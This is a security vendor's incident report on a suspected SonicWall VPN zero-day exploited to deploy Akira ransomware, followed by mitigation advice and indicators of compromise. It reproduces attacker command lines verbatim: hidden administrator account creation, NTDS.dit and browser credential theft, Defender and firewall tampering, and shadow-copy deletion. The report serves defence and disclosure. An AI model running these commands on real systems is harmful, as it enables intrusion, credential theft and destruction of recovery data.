TL;DR: A likely zero-day vulnerability in SonicWall VPNs is being actively exploited to bypass MFA and deploy ransomware. Huntress advises disabling the VPN service immediately or severely restricting access via IP allow-listing. We're seeing threat actors pivot directly to domain controllers within hours of the initial breach.
Over the last few days, the Huntress Security Operations Center (SOC) has been responding to a wave of high-severity incidents originating from SonicWall Secure Mobile Access (SMA) and firewall appliances. This isn't isolated; we're seeing this alongside our peers at Arctic Wolf, Sophos, and other security firms. The speed and success of these attacks, even against environments with MFA enabled, strongly suggest a zero-day vulnerability is being exploited in the wild.
The bottom line: this is a critical, ongoing threat.
Let's dive into what we're seeing.
The attack chain is swift and follows a consistent pattern. It starts with a breach of the SonicWall appliance itself. We’ve then seen a variety of post-exploitation techniques that vary based on the incident and include techniques linked to enumeration, detection evasion, lateral movement, and credential theft.
Post-exploitation: A well-worn path
Once on the network, the attackers don't waste time. Their actions are a mix of automated scripts for speed and hands-on-keyboard activity for precision. We've seen them:
Abuse privileged accounts: In many cases, the threat actors immediately gained administrative access by leveraging an over-privileged LDAP or service account used by the SonicWall device itself (e.g., sonicwall, LDAPAdmin).
Establish Command and Control: For persistence, they deploy Cloudflared tunnels and OpenSSH, often staged out of C:\ProgramData. This gives them a durable backdoor into the network.
Move laterally and steal credentials: Using their newfound privileges, they use WMI and PowerShell Remoting to move across the network. We’ve captured them running scripts to dump and decrypt credentials from Veeam Backup databases and using wbadmin.exe to back up the NTDS.dit Active Directory database for offline cracking.
Disable defenses: Before deploying ransomware, they methodically disable security tools. This includes using built-in Windows tools like Set-MpPreference to neuter Microsoft Defender and netsh.exe to disable the firewall.
Deploy ransomware: The final objective appears to be ransomware. We've seen them delete Volume Shadow Copies with vssadmin.exe to prevent easy recovery right before deploying what we assess to be Akira ransomware.
We’ve currently had around 20 different attacks that are directly related to this particular set of events, with the first of these starting on July 25. Of these attacks, there are some similarities, but also some differences in how each attacker operated. It is apparent that some of these attackers have at least part of the same playbook, or that they are adaptive to whatever situations they happen to encounter. Methodologies varied from utilizing tools brought in like Advanced_IP_Scanner, WinRAR, and FileZilla, to relying on various built-in tools (LOLBins), as well as installing various persistence mechanisms like new accounts, SSH, or full-blown RMMs like AnyDesk.
We will try to break down various parts of each of the attacks we’ve seen so far by category in no particular order. Clustered commands were used on the same machine and are therefore kept in close proximity. Some of these commands were used in variation on other machines:
Attackers also logged into Administrator or other accounts via RDP, brute forcing accounts, logging into compromised accounts.
Attackers used various tools like Advanced_IP_Scanner, or other LOLBins or built-in capabilities in order to enumerate various accounts or network information:
"C:\Users\[redacted]\Downloads\Advanced_IP_Scanner_2.5.4594.1.exe"
"C:\[redacted]\netscan\netscan.exe"
"C:\Windows\system32\nltest.exe" /trusted_domains
"C:\Windows\system32\PING.EXE" 192.168.xx.xxx
"C:\Windows\system32\nltest.exe" /dclist:
"C:\Users\[redacted]\Documents\Advanced_Port_Scanner_2.5.3869.exe"
Install-WindowsFeature RSAT-AD-PowerShell
Get-ADComputer -Filter * -Property * | Select-Object Enabled,
DNSHostName, IPv4Address, OperatingSystem, Description >
C:\programdata\[redacted].txt
cmd.exe /Q /c nltest /domain_trusts 1> \\Windows\\Temp\\ysKBfL 2>&1
cmd.exe /Q /c quser 1> \\127.0.0.1\ADMIN$\__1754125023.3698354 2>&1
net group "Domain admins" /dom
The most interesting of the following commands is the WinRAR execution. This command was executed on six different machines with identical command lines, with the only difference being the source or target drives in some cases:
"C:\Program Files\WinRAR\WinRAR.exe" a -ep1 -scul -r0 -iext -imon1 -- . X:\[Redacted]
C:\ProgramData\shares.txt
"C:\Program Files\FileZilla FTP Client\fzsftp.exe" -v
In some cases attackers decided to try to maintain persistence to some of these machines. They did this by adding accounts, or enabling or installing remote tools.
Installation of RMMs such as AnyDesk or ScreenConnect, and SSH
"C:\Windows\System32\msiexec.exe" /i "C:\ProgramData\OpenSSHa.msi"
Creation and Configuration of New User Accounts
"C:\Windows\system32\net.exe" user lockadmin Msnc?42da /add
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v commuser /d 0 /f
net user [REDACTED] VRT83g$%ce /add
net localgroup Administrators [redacted] /add
net localgroup "Remote Desktop Users" [redacted] /add
net group "Domain Admins" azuresync /add
cmd.exe /Q /c net user backupSQL Password123$ /add /dom 1> \\Windows\\Temp\\tinhLg 2>&1
cmd.exe /Q /c net group "Domain Admins" backupSQL /dom /add 1> \Windows\Temp\NDqyOI 2>&1
In addition to clearing event logs attackers often implemented the following evasive and lateral movement techniques:
Credential harvesting
cmd.exe /Q /c copy \"C:\Users\[redacted]\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Windows\Temp\1753954887.8450267"
"C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY -quiet
WMI lateral movement to run PowerShell for credential theft - from NetExec Veeam_Dump_Postgresql.ps1
Various firewall settings and security software disablement
In addition to recovered PowerShell history, we’ve also seen several of the following commands:
"C:\Windows\system32\SystemSettingsAdminFlows.exe" Defender DisableEnhancedNotifications 1
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22
Unrecovered scripts
C:\ProgramData\2.bat
C:\ProgramData\1.bat
Recovery prevention
"C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /quiet
Akira ransomware invocation
w.exe -p=\\[redacted]\C$ -n=1
This is an active threat that requires immediate attention.
Disable your SonicWall VPN. This is the most effective way to protect your network. We strongly advise you to disable SSL VPN access on your SonicWall appliances until an official patch and guidance are released.
If you can't disable it, lock it down. If the VPN is business-critical, immediately restrict access to a minimal allow-list of known, trusted IP addresses. Segment the network to prevent a breach of the appliance from immediately providing access to critical servers like domain controllers.
Audit your service accounts. That sonicwall or LDAP user does not need to be a Domain Admin. Ever. Ensure any service accounts follow the principle of least privilege.
Hunt for malicious activity. Use the Indicators of Compromise below to search your environment for signs of a breach.
The Huntress team is continuing to monitor this threat, and we will update as we learn more.
Special thanks to analysts, researchers, support analysts, technical account managers, and all involved in response to this incident and their contributions to this blog: Michael Tigges, Ben Folland, Dray Agha, Jamie Levy, Lindsey O-Donnell-Welch, Max Rogers, and many others.
|
Item |
Description |
|
42.252.99[.]59 |
Attacker IP |
|
45.86.208[.]240 |
Attacker IP |
|
77.247.126[.]239 |
Attacker IP |
|
104.238.205[.]105 |
Attacker IP |
|
104.238.220[.]216 |
Attacker IP |
|
181.215.182[.]64 |
Attacker IP |
|
193.163.194[.]7 |
Attacker IP |
|
193.239.236[.]149 |
Attacker IP |
|
194.33.45[.]155 |
Attacker IP |
|
w.exe sha256: d080f553c9b1276317441894ec6861573fa64fb1fae46165a55302e782b1614d |
Ransomware executable |
|
win.exe |
Ransomware executable |
|
C:\ProgramData\winrar.exe |
Data staging tooling. |
|
C:\ProgramData\OpenSSHa.msi |
OpenSSH installer |
|
C:\Program Files\OpenSSH\sshd.exe |
SSH executable for exfil |
|
C:\programdata\ssh\cloudflared.exe |
Cloudfare executable |
|
C:\Program Files\FileZilla FTP Client\fzsftp.exe |
Data exfiltration tooling. |
|
C:\ProgramData\1.bat |
Unknown attacker script |
|
C:\ProgramData\2.bat |
Unknown attacker script |
|
AS24863 - LINK-NET - 45.242.96.0/22 |
ASN/CIDR hosting adversary infrastructure. |
|
AS62240 - Clouvider - 45.86.208.0/22 |
ASN/CIDR hosting adversary infrastructure. |
|
AS62240 - Clouvider - 77.247.126.0/24 |
ASN/CIDR hosting adversary infrastructure. |
|
AS23470 - ReliableSite LLC - 104.238.204.0/22 |
ASN/CIDR hosting adversary infrastructure. |
|
AS23470 - ReliableSite LLC - 104.238.220.0/22 |
ASN/CIDR hosting adversary infrastructure. |
|
AS174 - COGENT-174 - 181.215.182.0/24 |
ASN/CIDR hosting adversary infrastructure. |
|
AS62240 - Clouvider - 193.163.194.0/24 |
ASN/CIDR hosting adversary infrastructure. |
|
AS62240 - Clouvider - 193.239.236.0/23 |
ASN/CIDR hosting adversary infrastructure. |
|
AS62240 - Clouvider - 194.33.45.0/24 |
ASN/CIDR hosting adversary infrastructure. |
|
backupSQL |
User created by attacker |
|
lockadmin |
User created by attacker |
|
Password123$ |
Password used by attacker |
|
Msnc?42da |
Password used by attacker |
|
VRT83g$%ce |
Password used by attacker |
Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
